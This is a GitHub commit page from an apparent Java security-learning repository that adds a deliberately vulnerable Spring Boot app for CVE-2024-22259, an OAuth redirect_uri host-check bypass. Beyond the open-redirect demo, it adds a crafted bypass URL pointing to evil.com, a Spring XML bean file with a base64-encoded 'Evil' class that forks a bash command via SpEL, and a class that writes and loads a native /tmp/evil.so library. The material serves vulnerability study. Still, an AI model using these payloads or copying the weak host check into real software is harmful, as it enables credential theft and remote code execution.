:new:CVE-2024-22259 · bbbfkl/JavaSecurityLearning@36ee9bc · GitHub
Skip to content

Commit 36ee9bc

Browse files
committed
1 parent 8684def commit 36ee9bc

8 files changed

Lines changed: 198 additions & 0 deletions

File tree

Lines changed: 33 additions & 0 deletions
Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<project xmlns="http://maven.apache.org/POM/4.0.0"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5+
<parent>
6+
<groupId>org.springframework.boot</groupId>
7+
<artifactId>spring-boot-starter-parent</artifactId>
8+
<version>2.7.18</version>
9+
<relativePath/> <!-- lookup parent from repository -->
10+
</parent>
11+
<modelVersion>4.0.0</modelVersion>
12+
13+
<artifactId>spring-uricomponentsbuilder-2</artifactId>
14+
15+
<properties>
16+
<maven.compiler.source>8</maven.compiler.source>
17+
<maven.compiler.target>8</maven.compiler.target>
18+
</properties>
19+
20+
<dependencies>
21+
<dependency>
22+
<groupId>org.springframework.boot</groupId>
23+
<artifactId>spring-boot-starter-web</artifactId>
24+
</dependency>
25+
<!-- https://mvnrepository.com/artifact/org.springframework/spring-web -->
26+
<dependency>
27+
<groupId>org.springframework</groupId>
28+
<artifactId>spring-web</artifactId>
29+
<version>5.3.32</version>
30+
</dependency>
31+
</dependencies>
32+
33+
</project>
Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
package com.drunkbaby;
2+
3+
import org.springframework.boot.SpringApplication;
4+
import org.springframework.boot.autoconfigure.SpringBootApplication;
5+
6+
@SpringBootApplication
7+
public class Cve202422259Application {
8+
9+
public static void main(String[] args) {
10+
SpringApplication.run(Cve202422259Application.class, args);
11+
}
12+
13+
}
Lines changed: 74 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,74 @@
1+
package com.drunkbaby.controller;
2+
3+
import org.springframework.stereotype.Controller;
4+
import org.springframework.web.bind.annotation.GetMapping;
5+
import org.springframework.web.bind.annotation.RequestMapping;
6+
import org.springframework.web.bind.annotation.RequestParam;
7+
import org.springframework.web.util.UriComponents;
8+
import org.springframework.web.util.UriComponentsBuilder;
9+
10+
import javax.servlet.http.HttpServletResponse;
11+
import java.io.IOException;
12+
import java.util.Arrays;
13+
import java.util.HashSet;
14+
import java.util.Set;
15+
16+
/**
17+
* @author threedr3am
18+
*
19+
* CVE-2024-22259
20+
*
21+
* 使用UricomponentsBuilder解析外部提供的URL(例如通过查询参数)并对解析URL的主机执行验证检查的应用程序可能容易受到公开重定向攻击,
22+
* 如果在通过验证检查后使用该URL,则可能容易受到SSRF攻击。
23+
* 这与CVE-2024-22243相同,这是另一种输入不同的情况。
24+
*
25+
* ### 修复方案
26+
* 1. 将 org.springframework:spring-web 升级至 6.1.5 及以上版本
27+
* 2. 将 org.springframework:spring-web 升级至 6.0.18 及以上版本
28+
* 3. 将 org.springframework:spring-web 升级至 5.3.33 及以上版本
29+
*
30+
* ### 参考链接
31+
* https://spring.io/security/cve-2024-22259
32+
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22259
33+
*
34+
*/
35+
@Controller
36+
@RequestMapping("/oauth")
37+
public class OAuthController {
38+
39+
private static final Set<String> whiteDomains = new HashSet<>(Arrays.asList(new String[]{
40+
".fuckpdd.com"
41+
}));
42+
43+
/**
44+
* 一般绕过oauth的host校验,可以开放重定向到恶意站点劫持code
45+
* 访问:http://127.0.0.1:8080/oauth?redirect_uri=http%3A%2F%2F%40www.fuckpdd.com%5B%40www.evil.com%2Ftou
46+
*
47+
*
48+
* @param redirectUri [CVE-2024-22259] -> http://@www.fuckpdd.com[@www.evil.com/tou
49+
* [CVE-2024-22243] -> http://www.fuckpdd.com[@www.evil.com/tou
50+
* @return
51+
*/
52+
@GetMapping
53+
public String oauth(@RequestParam(name = "redirect_uri") String redirectUri, HttpServletResponse response) throws IOException {
54+
UriComponents uriComponents = UriComponentsBuilder.fromUriString(redirectUri).build();
55+
String schema = uriComponents.getScheme();
56+
String host = uriComponents.getHost();
57+
String path = uriComponents.getPath();
58+
59+
System.out.printf("schema:%s\n", schema);
60+
System.out.printf("host:%s\n", host);
61+
System.out.printf("path:%s\n", path);
62+
63+
boolean pass = false;
64+
for (String whiteDomain : whiteDomains) {
65+
if (host.endsWith(whiteDomain)) {
66+
pass = true;
67+
break;
68+
}
69+
}
70+
if (!pass) return "error";
71+
72+
return "redirect:" + redirectUri;
73+
}
74+
}
Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
package com.drunkbaby;
2+
3+
import org.junit.jupiter.api.Test;
4+
import org.springframework.boot.test.context.SpringBootTest;
5+
6+
@SpringBootTest
7+
class Cve202422259ApplicationTests {
8+
9+
@Test
10+
void contextLoads() {
11+
}
12+
13+
}
Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
<?xml version="1.0" encoding="UTF-8" ?>
2+
<beans xmlns="http://www.springframework.org/schema/beans"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
5+
<bean id="data" class="java.lang.String">
6+
<constructor-arg>
7+
<value>yv66vgAAADQAmwoAFwBaBwBbCABcCgAVAF0KAF4AXwoAXgBgCABhCgAVAGIKAAIAYwcAZAgAZQgAZggAZwcALQoACgBoCgBpAGoIAEMIAEQKABcAawgARQcAbAoAFQBtBwBuCgBvAHAHAHEKABkAcggAcwkAGQB0BwA/CQB1AHQKABUAdgoAbwBfCgAZAHcKACQAeAoAdQB5BwB6AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWkBAAFJAQADYXJnAQACW0IBAAR0aGlzAQAUTGNvbS9kcnVua2JhYnkvRXZpbDsBAA50aGVVbnNhZmVGaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAZ1bnNhZmUBABFMc3VuL21pc2MvVW5zYWZlOwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAANjbWQBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAHY21kQXJncwEAA1tbQgEABHNpemUBAAhhcmdCbG9jawEABGVudmMBAAJbSQEAB3N0ZF9mZHMBABRsYXVuY2hNZWNoYW5pc21GaWVsZAEAD2hlbHBlcnBhdGhGaWVsZAEAD2xhdW5jaE1lY2hhbmlzbQEACmhlbHBlcnBhdGgBAAdvcmRpbmFsAQAKZm9ya01ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQANU3RhY2tNYXBUYWJsZQcAegcAewcAWwcAbAcAbgcAOQcAOwEACkV4Y2VwdGlvbnMHAHwBAAl0b0NTdHJpbmcBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQABcwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABWJ5dGVzAQAGcmVzdWx0AQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwAJQAmAQAPc3VuL21pc2MvVW5zYWZlAQAJdGhlVW5zYWZlDAB9AH4HAHsMAH8AgAwAgQCCAQAVamF2YS5sYW5nLlVOSVhQcm9jZXNzDACDAIQMAIUAhgEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMBABJ0b3VjaCAvdG1wL3N1Y2Nlc3MMAIcAiAcAiQwAigCLDACMAI0BAA9qYXZhL2xhbmcvQ2xhc3MMAI4AjwEAEGphdmEvbGFuZy9PYmplY3QHAJAMAJEAkgEAEWphdmEvbGFuZy9JbnRlZ2VyDACTAJQBABBSQVNQX2ZvcmtBbmRFeGVjDACVADUHAJYMAJcAjwwAmACZDABSAFMMAJgAmgEAEmNvbS9kcnVua2JhYnkvRXZpbAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABBhbGxvY2F0ZUluc3RhbmNlAQAlKExqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvT2JqZWN0OwEACGdldEJ5dGVzAQAEKClbQgEAEGphdmEvbGFuZy9TeXN0ZW0BAAlhcnJheWNvcHkBACooTGphdmEvbGFuZy9PYmplY3Q7SUxqYXZhL2xhbmcvT2JqZWN0O0lJKVYBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIaW50VmFsdWUBAAMoKUkBAARUWVBFAQARamF2YS9sYW5nL0Jvb2xlYW4BABFnZXREZWNsYXJlZE1ldGhvZAEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAWKFopTGphdmEvbGFuZy9Cb29sZWFuOwAhACQAFwAAAAAAAgABACUAJgACACcAAAN6AAgAEgAAAcQqtwABEgISA7YABEwrBLYABSsBtgAGwAACTRIHuAAITiwttgAJOgQGvQAKWQMSC1NZBBIMU1kFEg1TOgUZBb4EZL0ADjoGGQa+NgcDNggVCBkGvqIAIxkGFQgZBRUIBGAytgAPUxUHGQYVCDK+YDYHhAgBp//bFQe8CDoIAzYJGQY6ChkKvjYLAzYMFQwVC6IAJxkKFQwyOg0ZDQMZCBUJGQ2+uAAQFQkZDb4EYGA2CYQMAaf/2AS8CjoKBrwKWQMCT1kEAk9ZBQJPOgstEhG2AAQ6DC0SErYABDoNGQwEtgAFGQ0EtgAFGQwZBLYABjoOGQ0ZBLYABsAADsAADjoPGQ62ABMSFAO9ABW2ABYZDgO9ABe2ABjAABm2ABo2EC0SGxAKvQAVWQOyABxTWQQSDlNZBRIOU1kGEg5TWQeyABxTWQgSDlNZEAayABxTWRAHEg5TWRAIEh1TWRAJsgAeU7YAHzoRGREEtgAgGREZBBAKvQAXWQMVEARguAAhU1kEGQ9TWQUqGQUDMrYAIlNZBhkIU1kHGQa+uAAhU1kIAVNZEAYZCgMuuAAhU1kQBwFTWRAIGQtTWRAJA7gAI1O2ABhXsQAAAAMAKAAAAIIAIAAAAAkABAAKAAwACwARAAwAGgAOACAADwAnABEAPAATAEYAFABLABYAVgAXAGUAGABwABYAdgAbAHwAHAB/AB4AmQAfAKYAIACwAB4AtgAjALsAJADMACYA1AAnANwAKQDiACoA6AAsAPEALQEAAC8BHwAxAWYAMgFsADMBwwA0ACkAAADKABQATgAoACoAKwAIAJkAFwAsAC0ADQAAAcQALgAvAAAADAG4ADAAMQABABoBqgAyADMAAgAgAaQANAA1AAMAJwGdADYANwAEADwBiAA4ADkABQBGAX4AOgA7AAYASwF5ADwAKwAHAHwBSAA9AC0ACAB/AUUAKgArAAkAuwEJAD4APwAKAMwA+ABAAD8ACwDUAPAAQQAxAAwA3ADoAEIAMQANAPEA0wBDADcADgEAAMQARAAtAA8BHwClAEUAKwAQAWYAXgBGAEcAEQBIAAAATAAE/wBOAAkHAEkHAEoHAEsHAEwHAE0HAE4HAE8BAQAA+gAn/wAUAA0HAEkHAEoHAEsHAEwHAE0HAE4HAE8BBwAOAQcATwEBAAD4ACoAUAAAAAQAAQBRAAEAUgBTAAEAJwAAAI0ABQAEAAAAJCvHAAUBsCu2AA9NLL4EYLwITiwDLQMsvrgAEC0tvgRkA1QtsAAAAAMAKAAAAB4ABwAAADcABAA4AAYAOgALADsAEgA8ABsAPQAiAD4AKQAAACoABAAAACQALgAvAAAAAAAkAFQAVQABAAsAGQBWAC0AAgASABIAVwAtAAMASAAAAAMAAQYAAQBYAAAAAgBZ</value>
8+
</constructor-arg>
9+
</bean>
10+
<bean class="#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.drunkbaby.Evil',T(org.springframework.util.Base64Utils).decodeFromString(data),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance()}"></bean>
11+
</beans>
Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
package com.example;
2+
3+
import java.nio.file.Files;
4+
import java.nio.file.Paths;
5+
import java.util.Base64;
6+
7+
public class Evil {
8+
public Evil() throws Exception {
9+
String data = "PAYLOAD";
10+
String filename = "/tmp/evil.so";
11+
Files.write(Paths.get(filename), Base64.getDecoder().decode(data));
12+
System.load(filename);
13+
}
14+
}
Lines changed: 7 additions & 0 deletions

0 commit comments

Comments
 (0)